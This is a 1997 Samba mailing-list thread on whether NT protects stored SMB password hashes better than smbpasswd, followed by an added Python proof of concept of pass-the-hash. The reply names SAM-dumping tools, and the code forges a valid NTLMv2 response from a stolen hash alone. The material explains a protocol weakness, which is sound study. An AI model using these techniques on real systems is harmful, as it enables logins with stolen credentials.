Jacques Gelinas
1997-Oct-16 12:59 UTC
crypted SMB passwords: security issue only on Unix ?
I have been reading the FAQ on the SMB crypted passwords. This FAQ states
that there is a security issue. Mostly, if someone manages to grab a copy
of my smbpasswd file and has access to a modified client, he can access my
share without really knowing the original password (he supplies the crypted
one only). I understand pretty well the issue here.

It seems that NT does not have this problem, or at least tries to cope
with it (Well, they could have fixed the protocol for one and this would
have solved the problem!). Sounds like NT passwords are stored in a
protected area (not part of the file system) and they are further
protected by a key. So the crypted passwords are more difficult to read
(while probably not impossible to steal).

Can anyone confirm this?

--------------------------------------------------------
Jacques Gelinas (jacques@solucorp.qc.ca)
Linuxconf: The ultimate administration system for Linux.
see http://www.solucorp.qc.ca/linuxconf
new developments: mail to fax gateway, Apache, Samba
Luke Kenneth Casson Leighton
1997-Oct-16 15:58 UTC
crypted SMB passwords: security issue only on Unix ?
On Thu, 16 Oct 1997, Jacques Gelinas wrote:

> I have been reading the FAQ on the SMB crypted passwords. This FAQ states
> that there is a security issue. Mostly, if someone manages to grab a copy
> of my smbpasswd file

which will only be possible, if you have followed the instructions in
ENCRYPTION.txt, if they have root access. if they have root access, then
the smbpasswd file is the least of your worries.

> and has access to a modified client, he can access my
> share without really knowing the original password (he supplies the crypted
> one only). I understand pretty well the issue here.
>
> It seems that NT does not have this problem,

ho ho ho. hee hee hee.

> or at least tries to cope
> with it (Well, they could have fixed the protocol for one and this would
> have solved the problem!). Sounds like NT passwords are stored in a
> protected area

not really. use regedt32 as administrator to grant access to the SAM
database, and then run pwdump. or, run the equivalent NT resource kit
program.

> (not part of the file system) and they are further
> protected by a key.

ho ho ho. hee hee hee. not in < NT 4.0 SP3 they aren't. and only in
>= NT 4.0 SP3 have they added _YET ANOTHER_ level of obfuscation, using a
little program called syskey.exe.

> So the crypted passwords are more difficult to read.

if NT 4.0 can decrypt the SAM database (reverse-crypt performed by
syskey) then so can anyone else.

> (while probably not impossible to steal)
>
> Can anyone confirm this?

consider this a confirmation.

luke

Luke Kenneth Casson Leighton <lkcl@switchboard.net>
Lynx2.7-friendly Home Page: http://mailhost.cb1.com/~lkcl
"Apply the Laws of Nature to your environment before your environment
applies the Laws of Nature to you"
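The mechanism both posts are talking about, shown as an added example that is not code from this thread, from Samba or from NT: in SMB challenge/response authentication the client never sends the password, it sends a response keyed on the stored hash, so a "modified client" that starts from a hash lifted out of smbpasswd produces byte-for-byte what an honest client produces from the password, and the server cannot tell them apart. The smbpasswd line, the server challenge and the client blob below are constructed for the example, and all function names are mine. The response computed is the NTLMv2-style HMAC-MD5 one, which postdates this 1997 thread; the DES-based LM/NTLMv1 responses of the time have exactly the same property, since they too take only the stored hash as key. MD4 is implemented inline because the NT hash is MD4 over the UTF-16LE password and MD4 is no longer available by default in many OpenSSL builds.

```python
"""Pass-the-hash against SMB challenge/response (added example, not Samba code)."""
import hmac
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). The NT hash is MD4 of the UTF-16LE password."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    # Padding: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        # Each step updates one register; rotating (a,b,c,d) keeps the ABCD/DABC/... order.
        for i in range(16):  # round 1
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + g(b, c, d) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            k = (0, 2, 1, 3)[i // 4] + 4 * (0, 2, 1, 3)[i % 4]
            a, b, c, d = d, rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """The value stored in the NT SAM and in Samba's smbpasswd NT field."""
    return md4(password.encode("utf-16le"))


def parse_smbpasswd_nt_hash(line: str) -> bytes:
    """Pull the NT hash out of one smbpasswd line: user:uid:LMHASH:NTHASH:...
    (the trailing fields vary by Samba version and are not needed here)."""
    return bytes.fromhex(line.split(":")[3])


def ntlmv2_response(nt_hash_value: bytes, user: str, domain: str,
                    server_challenge: bytes, client_blob: bytes) -> bytes:
    """Client side. Only the hash enters the computation, never the password."""
    v2_key = hmac.new(nt_hash_value, (user.upper() + domain).encode("utf-16le"), "md5").digest()
    proof = hmac.new(v2_key, server_challenge + client_blob, "md5").digest()
    return proof + client_blob


def server_accepts(stored_nt_hash: bytes, user: str, domain: str,
                   server_challenge: bytes, response: bytes) -> bool:
    """Server side: recompute from the stored hash and compare. No password needed,
    which is exactly why the stored hash is a password-equivalent."""
    blob = response[16:]
    expected = ntlmv2_response(stored_nt_hash, user, domain, server_challenge, blob)
    return hmac.compare_digest(expected, response)


def demo() -> bool:
    """Honest client (has the password) vs. modified client (has only the smbpasswd hash)."""
    password = "password"
    # Constructed smbpasswd line; the LM field is left as the all-X marker since
    # the example only uses the NT field.
    smbpasswd_line = ("alice:1000:" + "X" * 32 + ":" + nt_hash(password).hex().upper()
                      + ":Alice Example:/home/alice:/bin/sh")
    challenge = b"\x01\x23\x45\x67\x89\xab\xcd\xef"   # constructed 8-byte server challenge
    blob = b"\x01\x01" + b"\x00" * 6 + b"\x00" * 8 + b"\xde\xad\xbe\xef\xca\xfe\xf0\x0d" + b"\x00" * 4  # constructed blob
    honest = ntlmv2_response(nt_hash(password), "alice", "EXAMPLE", challenge, blob)
    stolen = parse_smbpasswd_nt_hash(smbpasswd_line)
    modified_client = ntlmv2_response(stolen, "alice", "EXAMPLE", challenge, blob)
    return honest == modified_client and server_accepts(stolen, "alice", "EXAMPLE", challenge, modified_client)


if __name__ == "__main__":
    print("modified client accepted with hash only:", demo())
```

The point of the thread is in `server_accepts`: the server holds the same hash the client keys its response on, so whoever reads smbpasswd (or the SAM, as the reply notes) holds the credential itself, not something that still needs cracking. That is also why "fixing the protocol" is the only real remedy: any scheme in which the stored verifier is also the client's key has this property.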